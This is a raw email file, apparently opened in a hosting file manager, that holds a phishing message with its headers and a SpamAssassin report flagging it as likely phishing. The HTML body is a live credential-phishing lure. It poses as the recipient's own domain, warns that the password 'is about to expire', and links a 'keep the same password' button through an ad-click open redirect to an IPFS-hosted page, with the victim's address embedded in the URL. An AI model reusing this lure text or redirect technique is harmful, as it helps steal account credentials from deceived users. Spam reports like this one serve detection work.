OwlCyberSecurity - MANAGER

Edit File: 1740091971.M467983P3981837.premium128.web-hosting.com,S=9857,W=10023:2,

Return-Path: <info@keihin-ve.co.jp> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id YKNVGkOyt2cNwjwAAvhI2g (envelope-from <info@keihin-ve.co.jp>) for <contact+spam@gourayafroid.com>; Thu, 20 Feb 2025 17:52:51 -0500 Return-path: <info@keihin-ve.co.jp> Envelope-to: contact@gourayafroid.com Delivery-date: Thu, 20 Feb 2025 17:52:51 -0500 Received: from faracreative.com ([167.99.90.230]:59176) by premium128.web-hosting.com with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <info@keihin-ve.co.jp>) id 1tlFPR-00GloG-1B for contact@gourayafroid.com; Thu, 20 Feb 2025 17:52:51 -0500 Received: from faracreative.com (localhost.localdomain [127.0.0.1]) by faracreative.com (Postfix) with ESMTP id 663E3DCFBF for <contact@gourayafroid.com>; Thu, 20 Feb 2025 22:21:20 +0000 (GMT) Authentication-Results: faracreative.com; spf=pass (sender IP is 127.0.0.1) smtp.mailfrom=info@keihin-ve.co.jp smtp.helo=faracreative.com Received-SPF: pass (faracreative.com: localhost is always allowed.) client-ip=127.0.0.1; envelope-from=info@keihin-ve.co.jp; helo=faracreative.com; X-Spam-Level: Received: from faracreative.com ([127.0.0.1]) by faracreative.com (faracreative.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id S7AO13P4KdMf for <contact@gourayafroid.com>; Thu, 20 Feb 2025 22:21:18 +0000 (GMT) Received: from [36.133.87.98] (unknown [36.133.87.98]) by faracreative.com (Postfix) with ESMTPSA id D275CD9D69 for <contact@gourayafroid.com>; Thu, 20 Feb 2025 22:21:17 +0000 (GMT) Received-SPF: pass (faracreative.com: connection is authenticated) From: gourayafroid.com <info@keihin-ve.co.jp> To: contact@gourayafroid.com Date: 21 Feb 2025 06:20:39 +0800 Message-ID: <20250221062038.C6AE93C689785F4B@keihin-ve.co.jp> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=5.5 X-Spam-Score: 55 X-Spam-Bar: +++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: gourayafroid.com Your contact@gourayafroid.com password is about to expire (Action Required) You must take immediate steps to maintain and avoid restricting access to your gourayafroid.com account keep the same password Content analysis details: (5.5 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: doubleclick.net] 1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net [Blocked - see <https://www.spamcop.net/bl.shtml?36.133.87.98>] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [167.99.90.230 listed in bl.score.senderscore.com] 0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [167.99.90.230 listed in sa-trusted.bondedsender.org] 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) -0.0 SPF_HELO_PASS SPF: HELO matches SPF record 0.0 T_MXG_EMAIL_FRAG URI with email in fragment 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.0 T_PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 1.0 URI_DWEBIPFS References Interplanetary File System PtP content via dweb.link, likely phishing 1.5 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing X-Spam-Flag: YES Subject: ***SPAM*** Password Notifications - Take Action Now <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <p align=3D"center" style=3D"color: rgb(36, 36, 36); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 15px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><span styl= e=3D"font-family: Arial; box-sizing: border-box;"><span style=3D"box-sizing= : border-box;"><b><span style=3D"font-size: 23pt; box-sizing: border-box;">= <span style=3D"color: rgb(238, 97, 17); box-sizing: border-box;"><span styl= e=3D"font-size: 25pt; box-sizing: border-box;">gourayafroid.com</span><br s= tyle=3D"box-sizing: border-box;"></span></span><br style=3D"box-sizing: bor= der-box;"></b></span></span></p> <p align=3D"center" style=3D"color: rgb(44, 54, 58); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 14px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><b><span s= tyle=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-serif; = font-size: small;">Your contact@gourayafroid.com password is about to expir= e (Action Required) You must take immediate steps to maintain and avoid res= tricting access to your gourayafroid.com account</span>&nbsp;<br></b></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"><b> <a title=3D"Read Fax" style=3D"background: rgb(227, 96, 9); padding: 11px 2= 4px; color: rgb(255, 255, 255); box-sizing: border-box; text-decoration-lin= e: none;" href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.477429= 1382421/B23999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;d= c_lat=3D;dc_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://eng= lishwithwaliul.com/euope/redirect.php#contact@gourayafroid.com" target=3D"_= blank" rel=3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://bafybeidoz4j= 7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/%23bonn@cybe= r.net.pk&amp;source=3Dgmail&amp;ust=3D1740135446377000&amp;usg=3DAOvVaw3W7q= TJDETw6QI26tq2yCGp">keep the same password</a>&nbsp;&nbsp;&nbsp;<span style= =3D"color: rgb(227, 96, 9); box-sizing: border-box;">&nbsp; &nbsp;&nbsp;</s= pan></b></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"><b><span style=3D"color: rgb(34, 34, 34); font-fa= mily: Arial, Helvetica, sans-serif; font-size: small; box-sizing: border-bo= x;">Issues discovered in the claims fulfillment system will no longer be in= vestigated or fixed.&copy; gourayafroid.com</span><span style=3D"color: rgb= (34, 34, 34); font-family: Arial, Helvetica, sans-serif; font-size: small; = box-sizing: border-box;">&nbsp;</span> <span style=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-= serif; font-size: small; box-sizing: border-box;">2025</span></b></p> </body></html>